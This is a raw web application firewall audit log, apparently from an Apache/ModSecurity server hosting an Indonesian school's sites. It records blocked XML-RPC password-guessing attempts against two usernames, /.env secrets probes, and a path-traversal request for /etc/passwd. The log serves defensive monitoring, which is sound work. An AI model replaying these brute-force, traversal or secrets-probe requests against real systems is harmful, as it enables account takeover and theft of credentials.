HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc6fea71-E-- --fc6fea71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (43+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121357380964 5583 (- - -) Stopwatch2: 1749121357380964 5583; combined=3826, p1=556, p2=3070, p3=0, p4=0, p5=114, sr=154, sw=86, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc6fea71-Z-- --d7fde75c-A-- [05/Jun/2025:18:03:37 +0700] aEF5ieth7G2xELALzPZbxQAAAM0 103.236.140.4 54922 103.236.140.4 8181 --d7fde75c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d7fde75c-C-- wp.getUsersBlogs timkreatif support --d7fde75c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7fde75c-E-- --d7fde75c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (88+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121417682775 5438 (- - -) Stopwatch2: 1749121417682775 5438; combined=3809, p1=488, p2=3151, p3=0, p4=0, p5=100, sr=102, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fde75c-Z-- --33954631-A-- [05/Jun/2025:18:04:21 +0700] aEF5teth7G2xELALzPZb1gAAANY 103.236.140.4 55014 103.236.140.4 8181 --33954631-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --33954631-C-- wp.getUsersBlogs timkreatif 1234%^&* --33954631-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33954631-E-- --33954631-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121461568065 4316 (- - -) Stopwatch2: 1749121461568065 4316; combined=3360, p1=372, p2=2821, p3=0, p4=0, p5=99, sr=98, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33954631-Z-- --d1bcd771-A-- [05/Jun/2025:18:04:40 +0700] aEF5yOth7G2xELALzPZb8AAAAME 103.236.140.4 55070 103.236.140.4 8181 --d1bcd771-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --d1bcd771-C-- wp.getUsersBlogs timkreatif paswod888 --d1bcd771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1bcd771-E-- --d1bcd771-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121480829786 5061 (- - -) Stopwatch2: 1749121480829786 5061; combined=3707, p1=452, p2=3087, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1bcd771-Z-- --ba0cb724-A-- [05/Jun/2025:18:05:40 +0700] aEF6BH-K7ToMdu-YSIJVxQAAAAY 103.236.140.4 55254 103.236.140.4 8181 --ba0cb724-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ba0cb724-C-- wp.getUsersBlogs timkreatif basketball --ba0cb724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba0cb724-E-- --ba0cb724-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (84+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121540641144 6005 (- - -) Stopwatch2: 1749121540641144 6005; combined=4119, p1=536, p2=3407, p3=0, p4=0, p5=105, sr=93, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba0cb724-Z-- --3fc0fb30-A-- [05/Jun/2025:18:06:40 +0700] aEF6QCrHpfaS2Cuwh8UJKAAAAEM 103.236.140.4 55382 103.236.140.4 8181 --3fc0fb30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --3fc0fb30-C-- wp.getUsersBlogs timkreatif victoria --3fc0fb30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fc0fb30-E-- --3fc0fb30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121600050293 4319 (- - -) Stopwatch2: 1749121600050293 4319; combined=3278, p1=354, p2=2750, p3=0, p4=0, p5=105, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fc0fb30-Z-- --e864dd77-A-- [05/Jun/2025:18:07:40 +0700] aEF6fCrHpfaS2Cuwh8UJVwAAAEM 103.236.140.4 55536 103.236.140.4 8181 --e864dd77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e864dd77-C-- wp.getUsersBlogs timkreatif xbox360 --e864dd77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e864dd77-E-- --e864dd77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (72+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121660258559 4220 (- - -) Stopwatch2: 1749121660258559 4220; combined=3234, p1=355, p2=2713, p3=0, p4=0, p5=97, sr=80, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e864dd77-Z-- --e6b87967-A-- [05/Jun/2025:18:08:40 +0700] aEF6uFwdJdhOudw5hdz9UgAAAJE 103.236.140.4 55666 103.236.140.4 8181 --e6b87967-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e6b87967-C-- wp.getUsersBlogs timkreatif louise --e6b87967-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6b87967-E-- --e6b87967-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121720706176 4753 (- - -) Stopwatch2: 1749121720706176 4753; combined=3546, p1=388, p2=2955, p3=0, p4=0, p5=115, sr=84, sw=88, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6b87967-Z-- --b9870025-A-- [05/Jun/2025:18:09:40 +0700] aEF69FwdJdhOudw5hdz9lAAAAIA 103.236.140.4 55854 103.236.140.4 8181 --b9870025-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b9870025-C-- wp.getUsersBlogs timkreatif london12 --b9870025-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9870025-E-- --b9870025-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (80+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121780129459 4424 (- - -) Stopwatch2: 1749121780129459 4424; combined=3347, p1=344, p2=2836, p3=0, p4=0, p5=97, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9870025-Z-- --81c05a17-A-- [05/Jun/2025:18:10:33 +0700] aEF7KX-K7ToMdu-YSIJWNwAAAAU 103.236.140.4 56022 103.236.140.4 8181 --81c05a17-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 109.199.97.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 109.199.97.229 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --81c05a17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c05a17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749121833844244 648 (- - -) Stopwatch2: 1749121833844244 648; combined=266, p1=232, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c05a17-Z-- --4f516256-A-- [05/Jun/2025:18:10:35 +0700] aEF7K3-K7ToMdu-YSIJWOQAAABY 103.236.140.4 56028 103.236.140.4 8181 --4f516256-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 109.199.97.229 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 109.199.97.229 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4f516256-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f516256-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749121835262835 739 (- - -) Stopwatch2: 1749121835262835 739; combined=352, p1=248, p2=0, p3=0, p4=0, p5=104, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f516256-Z-- --b7d2bc3a-A-- [05/Jun/2025:18:10:40 +0700] aEF7MOth7G2xELALzPZcNwAAAME 103.236.140.4 56046 103.236.140.4 8181 --b7d2bc3a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b7d2bc3a-C-- wp.getUsersBlogs miswan testtest --b7d2bc3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7d2bc3a-E-- --b7d2bc3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121840242570 5821 (- - -) Stopwatch2: 1749121840242570 5821; combined=4066, p1=488, p2=3408, p3=0, p4=0, p5=99, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7d2bc3a-Z-- --3c7aa15b-A-- [05/Jun/2025:18:10:47 +0700] aEF7N1wdJdhOudw5hdz9wgAAAJg 103.236.140.4 56084 103.236.140.4 8181 --3c7aa15b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 147.182.149.75 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3c7aa15b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c7aa15b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749121847311538 683 (- - -) Stopwatch2: 1749121847311538 683; combined=252, p1=218, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c7aa15b-Z-- --7bb9535b-A-- [05/Jun/2025:18:11:40 +0700] aEF7bH-K7ToMdu-YSIJWRwAAAAI 103.236.140.4 56240 103.236.140.4 8181 --7bb9535b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --7bb9535b-C-- wp.getUsersBlogs miswan miswan1992 --7bb9535b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bb9535b-E-- --7bb9535b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (74+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121900078134 4204 (- - -) Stopwatch2: 1749121900078134 4204; combined=3245, p1=372, p2=2707, p3=0, p4=0, p5=97, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bb9535b-Z-- --76ab3b3d-A-- [05/Jun/2025:18:12:46 +0700] aEF7rirHpfaS2Cuwh8UJYgAAAE0 103.236.140.4 56388 103.236.140.4 8181 --76ab3b3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --76ab3b3d-C-- wp.getUsersBlogs miswan marketing2013_ --76ab3b3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ab3b3d-E-- --76ab3b3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (68+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749121966525367 5222 (- - -) Stopwatch2: 1749121966525367 5222; combined=3716, p1=455, p2=3072, p3=0, p4=0, p5=110, sr=91, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ab3b3d-Z-- --bfb7a16d-A-- [05/Jun/2025:18:13:36 +0700] aEF74FwdJdhOudw5hdz-IwAAAJc 103.236.140.4 56576 103.236.140.4 8181 --bfb7a16d-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172954114 --bfb7a16d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bfb7a16d-E-- --bfb7a16d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122016425922 1626 (- - -) Stopwatch2: 1749122016425922 1626; combined=559, p1=354, p2=180, p3=0, p4=0, p5=25, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfb7a16d-Z-- --3c398809-A-- [05/Jun/2025:18:13:51 +0700] aEF771wdJdhOudw5hdz-JAAAAJA 103.236.140.4 56588 103.236.140.4 8181 --3c398809-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --3c398809-C-- wp.getUsersBlogs miswan Admin888 --3c398809-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c398809-E-- --3c398809-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (76+1 hits since last 